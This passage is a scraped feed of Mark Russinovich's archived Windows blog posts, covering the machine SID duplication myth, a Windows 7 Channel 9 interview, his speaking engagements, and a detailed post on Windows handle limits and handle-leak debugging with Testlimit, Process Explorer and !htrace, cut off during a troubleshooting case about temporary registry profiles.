DC’s have the same machine SID. Software that relies on unique computer identities either uses computer names or computer Domain SIDs (the SID of the computer accounts in the Domain). </P> <H3> The New Best Practice </H3> <P> It’s a little surprising that the SID duplication issue has gone unquestioned for so long, but everyone has assumed that someone else knew exactly why it was a problem. To my chagrin, NewSID has never really done anything useful and there’s no reason to miss it now that it’s retired. <SPAN style="font-family: 'Calibri','sans-serif'; font-size: 11pt; mso-fareast-font-family: calibri; mso-fareast-theme-font: minor-latin; mso-ansi-language: en-us; mso-fareast-language: en-us; mso-bidi-language: ar-sa"> Note that Sysprep resets other machine-specific state that, if duplicated, can cause problems for certain applications like Windows Server Update Services (WSUS), so Microsoft’s support policy will still require cloned systems to be made unique with Sysprep </SPAN> </P> </BODY></HTML> Thu, 27 Jun 2019 06:58:22 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-machine-sid-duplication-myth-and-why-sysprep-matters/ba-p/723859 MarkRussinovich 2019-06-27T06:58:22Z Channel 9: Inside Windows 7 Redux https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/channel-9-inside-windows-7-redux/ba-p/723850 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 22, 2009 </STRONG> <BR /> <P> Windows 7 hit general availability today, putting it in stores and on new PC’s. There are plenty of beneath-the-surface changes that make Windows 7 more power efficient, scalable, secure and responsive (and of course, there are lots of user-visible features like user-interface enhancements like Aero Snap and Aero Peek; to easier file sharing and streaming with Home Group and PlayTo; to business-focused features like DirectAccess and Branch Cache). I recorded a Channel 9 interview last year with Charles Torre where I talked about a number of these enhancements, including core parking, support for systems with more than 64 processors, the removal of the dispatcher lock and more. There’s obviously a lot of interest in Windows 7 because the video has become the most-viewed in Channel 9’s history with 658,000 views at the time of this post! </P> <BLOCKQUOTE> <P> <A href="#" mce_href="#" target="_blank"> <FONT color="#669966"> Channel 9: Inside Windows 7 </FONT> </A> </P> </BLOCKQUOTE> <P> I always enjoy chatting with Charles and showing my support for Channel 9, so a couple of weeks ago we talked again, this time about some of the changes I didn’t have a chance to cover in my previous Windows 7 interview. In this latest video, I describe Distributed Fair Share Scheduling (DFSS) and memory management enhancements. I also show demos of process reflection and how Windows divides the processors into groups on a running 256-processor system, something that’s required for compatibility with applications that use thread management APIs designed for systems with less than 64 processors. Finally, I talk a little about how I started with computers. Enjoy! </P> <BLOCKQUOTE> <P> <A href="#" mce_href="#" target="_blank"> <FONT color="#669966"> Channel 9: Inside Windows 7 Redux </FONT> </A> </P> </BLOCKQUOTE> <P> <A href="#" mce_href="#" target="_blank"> <FONT color="#669966"> Dave Solomon </FONT> </A> and I, along with Alex Ionescu, are hard at work on the 6th Edition of <A href="#" mce_href="#" target="_blank"> <FONT color="#669966"> Windows Internals </FONT> </A> that will cover all the significant Windows 7 and Windows Server 2008 R2 kernel changes in detail, but in the meantime stay tuned to my blog where I’m going to start a multi-post Windows 7 and Windows Server 2008 R2 kernel changes series. </P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:57:26 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/channel-9-inside-windows-7-redux/ba-p/723850 MarkRussinovich 2019-06-27T06:57:26Z Recent and Upcoming Speaking Engagements https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/recent-and-upcoming-speaking-engagements/ba-p/723849 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 08, 2009 </STRONG> <BR /> <P> I wanted to update you on my recent and upcoming speaking engagements. First, I’ve been hosting a series of virtual roundtables for the <A href="#" target="_blank"> Springboard Series </A> program. Springboard’s purpose is to provide a one-stop resource for IT Pros evaluating, deploying and managing Windows. The most recent roundtable, which took place at the end of September, focused on virtualization technologies such as App-V, XP Mode, MEDV, and Remote Desktop Sessions, and how you can use them to address application compatibility as you move from Windows XP to Windows Vista or Windows 7. At the table we had Microsoft application compatibility experts and industry partners and it was another great discussion of the issues and tradeoffs of various approaches. Check out the recording <A href="#" target="_blank"> here </A> and the previous roundtables <A href="#" target="_blank"> here </A> . </P> <P> On September 22 I delivered a session at the <A href="#" target="_blank"> Intel Developer Forum </A> (IDF) in San Francisco with Shiv Kaushik, an Intel Fellow, on how Microsoft and Intel collaborated during this release cycle to make sure that Windows takes advantage of innovations delivered by new Intel hardware, specifically the Nehalem platform. You can watch the presentation free on Intel’s IDF site <A href="#" target="_blank"> here </A> . </P> <P> In November I’ll be speaking at <A href="#" target="_blank"> TechEd Europe </A> in Berlin and the <A href="#" target="_blank"> Professional Developer’s Conference </A> in Los Angeles. I’m delivering four sessions at TechEd, two of which, the Case of the Unexplained and Pushing the Limits of Windows, are based on blog post series I’ve been running: </P> <UL> <LI> <STRONG> Windows 7 and Windows Server 2008 R2 Kernel Changes <BR /> </STRONG> This session goes beneath the hood of Windows 7 and Windows Server 2008 R2 to describe and demonstrate the key changes in the kernel. Topics include: scalability improvements (such as removal of the global scheduler lock, support for more than 64 logical processors, and user mode scheduling), core parking and timer coalescing for power efficiency, trigger-started services, improved multi-function device support, core architecture changes to modularize Windows ("Minwin") and more. </LI> <LI> <STRONG> Case of the Unexplained 2009...Windows Troubleshooting with Mark Russinovich <BR /> </STRONG> Come hear Mark Russinovich, the master of Windows troubleshooting, walk you through step by step how he has solved seemingly unsolvable system and application problems on Windows. With all new real case studies, Mark will show how to apply the Microsoft Debugging Tools and his own Sysinternals tools, including Process Explorer, Process Monitor, and Accesschk, to solve system crashes, process hangs, security vulnerabilities, DLL conflicts, permissions problems, registry misconfiguration, network hangs, and file system issues. These tools are used on a daily basis by Microsoft Product Support and have been used effectively to solve a wide variety of desktop and server issues, so being familiar with their operation and application will assist you in dealing with different problems on Windows. </LI> <LI> <STRONG> Pushing the Limits of Windows <BR /> </STRONG> How many processes, threads, and handles can you make?&nbsp; How does Windows react when it's pushed to the limit? This session goes deep into the kernel to explain what limits Windows from creating more processes, threads, handles, and what the real limits are for physical and virtual memory. How much more can you do with 64-bits? Live demos show the effect on Windows when various resources are exhausted. </LI> <LI> <STRONG> Windows and Malware: Which Features are Security and Which Aren’t <BR /> </STRONG> This session goes under the hood of a number of Windows features that all have the common trait of looking and smelling like security to present their true purpose and value. Learn which of technologies like Kernel Patch Protection, UAC elevations, Protected Mode Internet Security, Service isolation, Code Integrity, and virtual machines really make security guarantees and which are really designed to solve other problems. </LI> </UL> <P> At the <A href="#" target="_blank"> PDC </A> , I’ll be delivering the <A href="#" target="_blank"> kernel changes talk </A> and participating in the kernel portion of a Windows 7 boot camp pre-conference that’s free to everyone, whether you’re attending the PDC or not. Joining me will be Memory Manager architect <A href="#" target="_blank"> Landy Wang </A> and Windows Kernel architect <A href="#" target="_blank"> Arun Kishan </A> (who brought us great scalability in Windows Server 2008 R2 by removing the kernel’s dispatcher lock). You can find out more <A href="#" target="_blank"> here </A> . </P> <P> I look forward to seeing you at one of my sessions! </P> <P> Finally, a little off-topic, but I’ve signed up for Twitter and am shooting to be the anti-Ashton Kutcher. Actually, I’m setting my sites a little lower: I want to be the first user to get to 10,000 followers without ever tweeting or following anyone else (in other words, not using Twitter at all). Sign up to follow me <A href="#" target="_blank"> here </A> ! </P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:57:22 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/recent-and-upcoming-speaking-engagements/ba-p/723849 MarkRussinovich 2019-06-27T06:57:22Z Pushing the Limits of Windows: Handles https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-handles/ba-p/723848 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Sep 29, 2009 </STRONG> <BR /> <P> This is the fifth post in my <STRONG> Pushing the Limits of Windows </STRONG> series where I explore the upper bound on the number and size of resources that Windows manages, such as physical memory, virtual memory, processes and threads. Here’s the index of the entire Pushing the Limits series. While they can stand on their own, they assume that you read them in order. </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 1 </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 2 </A> </P> </BLOCKQUOTE> <P> This time I’m going to go inside the implementation of handles to find and explain their limits. Handles are data structures that represent open instances of basic operating system objects applications interact with, such as files, registry keys, synchronization primitives, and shared memory. There are two limits related to the number of handles a process can create: the maximum number of handles the system sets for a process and the amount of memory available to store the handles and the objects the application is referencing with its handles. </P> <P> In most cases the limits on handles are far beyond what typical applications or a system ever use. However, applications not designed with the limits in mind may push them in ways their developers don’t anticipate. A more common class of problems arise because the lifetime of these resources must be managed by applications and, just like for virtual memory, resource lifetime management is challenging even for the best developers. An application that fails to release unneeded resources causes a leak of the resource that can ultimately cause a limit to be hit, resulting in bizarre and difficult to diagnose behaviors for the application, other applications or the system in general. </P> <P> As always, I recommend you read the previous posts because they explain some of the concepts&nbsp; this post references, like paged pool. </P> <H4> Handles and Objects </H4> <P> The kernel-mode core of Windows, which is implemented in the %SystemRoot%\System32\Ntoskrnl.exe image, consists of various subsystems such as the Memory Manager, Process Manager, I/O Manager, Configuration Manager (registry), which are all parts of the Executive. Each of these subsystems defines one or more types with the Object Manager to represent the resources they expose to applications. For example, the Configuration Manager defines the <EM> key </EM> object to represent an open registry key; the memory manager defines the <EM> Section </EM> object for shared memory; the Executive defines S <EM> emaphore </EM> , M <EM> utant </EM> (the internal name for a mutex), and <EM> Event </EM> synchronization objects (these objects wrap fundamental data structures defined by the operating system’s Kernel subsystem); the I/O Manager defines the <EM> File </EM> object to represent open instances of device driver resources, which include file system files; and the Process Manager the creates <EM> Thread </EM> and <EM> Process </EM> objects I discussed in my last Pushing the Limits post. Every release of Windows introduces new object types with Windows 7 defining a total of 42. You can see the objects defined by running the Sysinternals <A href="#" mce_href="#" target="_blank"> Winobj </A> utility with administrative rights and navigating to the ObjectTypes directory in the Object Manager namespace: </P> <P> <IMG alt="image" border="0" height="377" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_18.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_18.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121164iAD422ECD8A01DD05" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="304" /> </P> <P> When an application wants to manage one of these resources it first must call the appropriate API to create or open the resource. For instance, the <A href="#" mce_href="#" target="_blank"> CreateFile </A> function opens or creates a file, the <A href="#" mce_href="#" target="_blank"> RegOpenKeyEx </A> function opens a registry key, and the <A href="#" mce_href="#" target="_blank"> CreateSemaphoreEx </A> function opens or creates a semaphore. If the function succeeds, Windows allocates a <EM> handle </EM> in the <EM> handle table </EM> of the application’s process and returns the handle value, which applications treat as opaque but that is actually the index of the returned handle in the handle table. </P> <P> With the handle in hand, the application then queries or manipulates the object by passing the handle value to subsequent API functions like <A href="#" mce_href="#" target="_blank"> ReadFile </A> , <A href="#" mce_href="#" target="_blank"> SetEvent </A> , <A href="#" mce_href="#" target="_blank"> SetThreadPriority </A> , and <A href="#" mce_href="#" target="_blank"> MapViewOfFile </A> . The system can look up the object the handle refers to by indexing into the handle table to locate the corresponding handle entry, which contains a pointer to the object. The handle entry also stores the accesses the process was granted at the time it opened the object, which enables the system to make sure it doesn’t allow the process to perform an operation on the object for which it didn’t ask permission. For example, if the process successfully opened a file for read access, the handle entry would look like this: </P> <P> <IMG alt="image" border="0" height="271" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_19.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_19.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121165iF3A18DA47E0CE5BA" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="380" /> </P> <P> If the process tried to write to the file, the function would fail because the access hadn’t been granted and the cached read access means that the system doesn’t have to execute a more expensive access-check again. </P> <H4> Maximum Number of Handles </H4> <P> You can explore the first limit with the Testlimit tool I’ve been using in this series to empirically explore limits. It’s available for download on the Windows Internals book page <A href="#" mce_href="#" target="_blank"> here </A> . To test the number of handles a process can create, Testlimit implements the –h switch that directs it to create as many handles as possible. It does so by creating an event object with <A href="#" mce_href="#" target="_blank"> CreateEvent </A> and then repeatedly duplicating the handle the system returns using <A href="#" mce_href="#" target="_blank"> DuplicateHandle </A> . By duplicating the handle, Testlimit avoids creating new events and the only resources it consumes are those for the handle table entries. Here’s the result of Testlimit with the –h option on a 64-bit system: </P> <P> <IMG alt="image" border="0" height="107" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121166iCAF141C5E3AFBCDE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="374" /> </P> <P> The result doesn’t represent the total number of handles a process can create, however, because system DLLs open various objects during process initialization. You see a process’s total handle count by adding a handle count column to Task Manager or Process Explorer. The total shown for Testlimit in this case is 16,711,680: </P> <P> <IMG alt="image" border="0" height="58" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_2.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121167i7600247636DAA44B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="197" /> </P> <P> When you run Testlimit on a 32-bit system, the number of handles it can create is slightly different: </P> <P> <IMG alt="image" border="0" height="115" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_3.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121168i49BD1D3E9760DFBB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Its total handle count is also different, 16,744,448: </P> <P> <IMG alt="image" border="0" height="44" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_4.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121169i248FCCDE24B93728" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="190" /> </P> <P> Where do the differences come from? The answer lies in the way that the Executive, which is responsible for managing handle tables, sets the per-process handle limit, as well as the size of a handle table entry. In one of the rare cases where Windows sets a hard-coded upper limit on a resource, the Executive defines 16,777,216 (16*1024*1024) as the maximum number of handles a process can allocate. Any process that has more than a ten thousand handles open at any given point in time is likely either poorly designed or has a handle leak, so a limit of 16 million is essentially infinite and can simply help prevent a process with a leak from impacting the rest of the system. Understanding why the numbers Task Manager shows don’t equal the hard-coded maximum requires a look at the way the Executive organizes handle tables. </P> <P> A handle table entry must be large enough to store the granted-access mask and an object pointer. The access mask is 32-bits, but the pointer size obviously depends on whether it’s a 32-bit or 64-bit system. Thus, a handle entry is 8-bytes on 32-bit Windows and 12-bytes on 64-bit Windows. 64-bit Windows aligns the handle entry data structure on 64-bit boundaries, so a 64-bit handle entry actually consumes 16-bytes. Here’s the definition for a handle entry on 64-bit Windows, as shown in a kernel debugger using the dt (dump type) command: </P> <P> <IMG alt="image" border="0" height="140" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_7.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121170i22304F2671197DC3" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="484" /> </P> <P> The output reveals that the structure is actually a union that can sometimes store information other than an object pointer and access mask, but those two fields are highlighted. </P> <P> The Executive allocates handle tables on demand in page-sized blocks that it divides into handle table entries. That means a page, which is 4096 bytes on both x86 and x64, can store 512 entries on 32-bit Windows and 256 entries on 64-bit Windows. The Executive determines the maximum number of pages to allocate for handle entries by dividing the hard-coded maximum,16,777,216, by the number of handle entries in a page, which results on 32-bit Windows to 32,768 and on 64-bit Windows to 65,536. Because the Executive uses the first entry of each page for its own tracking information, the number of handles available to a process is actually 16,777,216 minus those numbers, which explains the results obtained by Testlimit: 16,777,216-65,536 is 16,711,680 and 16,777,216-65,536-32,768 is 16,744,448. </P> <H4> Handles and Paged Pool </H4> <P> The second limit affecting handles is the amount of memory required to store handle tables, which the Executive allocates from paged pool. The Executive uses a three-level scheme, similar to the way that processor Memory Management Units (MMUs) manage virtual to physical address translations, to keep track of the handle table pages that it allocates. We’ve already seen the organization of the lowest and mid levels, which store actual handle table entries. The top level serves as pointers into the mid-level tables and includes 1024 entries per-page on 32-bit Windows. The total number of pages required to store the maximum number of handles can therefore be calculated for 32-bit Windows as 16,777,216/512*4096, which is 128MB. That’s consistent with the paged pool usage of Testlimit as shown in Task Manager: </P> <P> <IMG alt="image" border="0" height="46" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_5.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121171iACBEA5DC37E45F58" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="184" /> </P> <P> On 64-bit Windows, there are 256 pointers in a page of top-level pointers. That means the total paged pool usage for a full handle table is 16,777,216/256*4096, which is 256MB. A look at Testlimit’s paged pool usage on 64-bit Windows confirms the calculation: </P> <P> <IMG alt="image" border="0" height="42" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_6.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121172iB3E89B34B67FEAFC" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="188" /> </P> <P> Paged pool is generally large enough to more than accommodate those sizes, but as I stated earlier, a process that creates that many handles is almost certainly going to exhaust other resources, and if it reaches the per-process handle limit it will probably fail itself because it can’t open any other objects. </P> <H4> Handle Leaks </H4> <P> A handle leaker will have a handle count that rises over time. The reason that a handle leak is so insidious is that unlike the handles Testlimit creates, which all point to the same object, a process leaking handles is probably leaking objects as well. For example, if a process creates events but fails to close them, it will leak both handle entries and event objects. Event objects consume nonpaged pool, so the leak will impact nonpaged pool in addition to paged pool. </P> <P> You can graphically spot the objects a process is leaking using Process Explorer’s handle view because it highlights new handles in green and closed handles in red; if you see lots of green with infrequent red then you might be seeing a leak. You can watch Process Explorer’s handle highlighting in action by opening a Command Prompt process, selecting the process in Process Explorer, opening the handle-view lower pane and then changing directory in the Command Prompt. The old working directory’s handle will highlight in red and the new one in green: </P> <P> <IMG alt="image" border="0" height="137" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_8.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121173i88B5CB5A9C9CCD9C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="277" /> </P> <P> By default, Process Explorer only shows handles that reference objects that have names, which means that you won’t see all the handles a process is using unless you select <EM> Show Unnamed Handles and Mappings </EM> from the View menu. Here are some of the unnamed handles in Command Prompt’s handle table: </P> <P> <IMG alt="image" border="0" height="144" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_14.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121174i2B2ABF693BE52C14" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="384" /> </P> <P> Just like most bugs, only the developer of the code that’s leaking can fix it. If you spot a leak in a process that can host multiple components or extensions, like Explorer, a Service Host or Internet Explorer, then the question is what component is the one responsible for the leak. Figuring that out might enable you to avoid the problem by disabling or uninstalling the problematic extension, fix the problem by checking for an update, or report the bug to the vendor. </P> <P> Fortunately, Windows includes a handle tracing facility that you can use to help identify leaks and the responsible software. It’s enabled on a per-process basis and when active causes the Executive to record a stack trace at the time every handle is created or closed. You can enable it either by using the <A href="#" mce_href="#" target="_blank"> Application Verifier </A> , a free download from Microsoft, or by using the <A href="#" mce_href="#" target="_blank"> Windows <FONT color="#acb613"> D </FONT> ebugger </A> (Windbg). You should use the Application Verifier if you want the system to track a process’s handle activity from when it starts. In either case, you’ll need to use a debugger and the <A href="#" mce_href="#" target="_blank"> !htrace </A> debugger command to view the trace information. </P> <P> To demonstrate the tracing in action, I launched Windbg and attached to the Command Prompt I had opened earlier. I then executed the !htrace command with the - <EM> enable </EM> switch to turn on handle tracing: </P> <P> <IMG alt="image" border="0" height="102" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_20.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_20.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121175i549A7734BCD4E4C5" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="464" /> </P> <P> I let the process’s execution continue and changed directory again. Then I switched back to Windbg, stopped the process’s execution, and executed htrace without any options, which has it list all the open and close operations the process executed since the previous !htrace snapshot (created with the <EM> –snapshot </EM> option) or from when handle tracing was enabled. Here’s the output of the command for the same session: </P> <P> <IMG alt="image" border="0" height="830" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_16.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121176i66ECE9FAF818A629" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The events are printed from most recent operation to least, so reading from the bottom, Command Prompt opened handle 0xb8, then closed it, next opened handle 0x22c, and finally closed handle 0xec. Process Explorer would show handle 0x22c in green and 0xec in red if it was refreshed after the directory change, but probably wouldn’t see 0xb8 unless it happened to refresh between the open and close of that handle. The stack for 0x22c’s open reveals that it was the result of Command Prompt (cmd.exe) executing its ChangeDirectory function. Adding the handle value column to Process Explorer confirms that the new handle is 0x22c: </P> <P> <IMG alt="image" border="0" height="76" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_17.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_17.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121177iCAD68F7BF36BB1E9" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="234" /> </P> <P> If you’re just looking for leaks, you should use !htrace with the <EM> –diff </EM> switch, which has it show only new handles since the last snapshot or start of tracing. Executing that command shows just handle 0x22c, as expected: </P> <P> <IMG alt="image" border="0" height="255" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_15.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsHandlesGDIObjec_C315/image_thumb_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121178i722B7719E02B7BC4" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Finally, a great video that presents more tips for debugging handle leaks is this Channel 9 interview with Jeff Dailey, a Microsoft Escalation Engineer that debugs them for a living: <A href="#" mce_href="#" title="https://channel9.msdn.com/posts/jeff_dailey/Understanding-handle-leaks-and-how-to-use-htrace-to-find-them/" target="_blank"> https://channel9.msdn.com/posts/jeff_dailey/Understanding-handle-leaks-and-how-to-use-htrace-to-find-them/ </A> </P> <P> Next time I’ll look at limits for a couple of other handle-based resources, GDI Object and USER Objects. Handles to those resources are managed by the Windows subsystem, not the Executive, so use different resources and have different limits. </P> </BODY></HTML> Thu, 27 Jun 2019 06:57:18 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-handles/ba-p/723848 MarkRussinovich 2019-06-27T06:57:18Z The Case of the Temporary Registry Profiles https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-temporary-registry-profiles/ba-p/723832 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 10, 2009 </STRONG> <BR /> <P> Microsoft Customer Support Services (CSS) is one of the biggest customers of the Sysinternals tools and they often send me interesting cases they’ve solved with them. This particular case is especially interesting because it affected a large number of users and the troubleshooting process made use of one of <A href="#" target="_blank"> Process Monitor’s </A> lesser-known features. The case opened when a customer contacted Microsoft support reporting that several of their users would occasionally get this error message when loggging on to their systems: </P> <P> <IMG alt="image" border="0" height="161" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheNewLogonRegistryProfiles_DF02/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121159iF5E14BB28D5AAA3B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="324" /> </P> <P> This caused Windows to create a temporary profile for the user’s logon session. A user profile consists of a directory, %UserProfile%, into which applications save user-specific configuration and data files, as well as a registry hive file stored in that directory, %UserProfile%\Ntuser.dat, that the Winlogon process loads when the user logs in. Applications store user settings in the registry hive by calling registry functions that refer to the HKEY_CURRENT_USER (HKCU) root key. The user’s loss of access to their profile made the problem critical, because whenever that happened, the user would apparently lose all their settings and access to files stored in their profile directory. In most cases, users contacted the company’s support desk, which would ask the user to try rebooting and logging in until the problem resolved itself. </P> <P> As with all cases, Microsoft support began by asking about the system configuration, inventory of installed software, and about any recent changes the company had made to their systems. In this case, the fact that stood out was that all the systems on which the problem had occurred had recently been upgraded to a new version of Citrix Corporation's ICA client, a remote desktop application. Microsoft contacted Citrix support to see if they knew of any issues with the new client. They didn’t, but said they would investigate. </P> <P> Unsure whether the ICA client upgrade was responsible for the profile problem, Microsoft support instructed the customer to enable profile logging, which you can do by configuring a registry key as per this Knowledge Base article: <A href="#" target="_blank"> How to enable user environment debug logging in retail builds of Windows </A> . The customer pushed a script out to their systems to make the required registry changes and shortly after got another call from a user with the profile problem. They grabbed a copy of the profile log off the system from %SystemRoot%\Debug\UserMode\Userenv.log and sent it into Microsoft. The log was inconclusive, but did provide an important clue: it indicated that the user’s profile had failed to load because of error 32, which is <A href="#" target="_blank"> ERROR_SHARING_VIOLATION </A> : </P> <P> <IMG alt="image" border="0" height="70" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheNewLogonRegistryProfiles_DF02/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121160i97F72B62C0E964C4" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> When a process opens a file, it specifies what kinds of sharing it allows for the 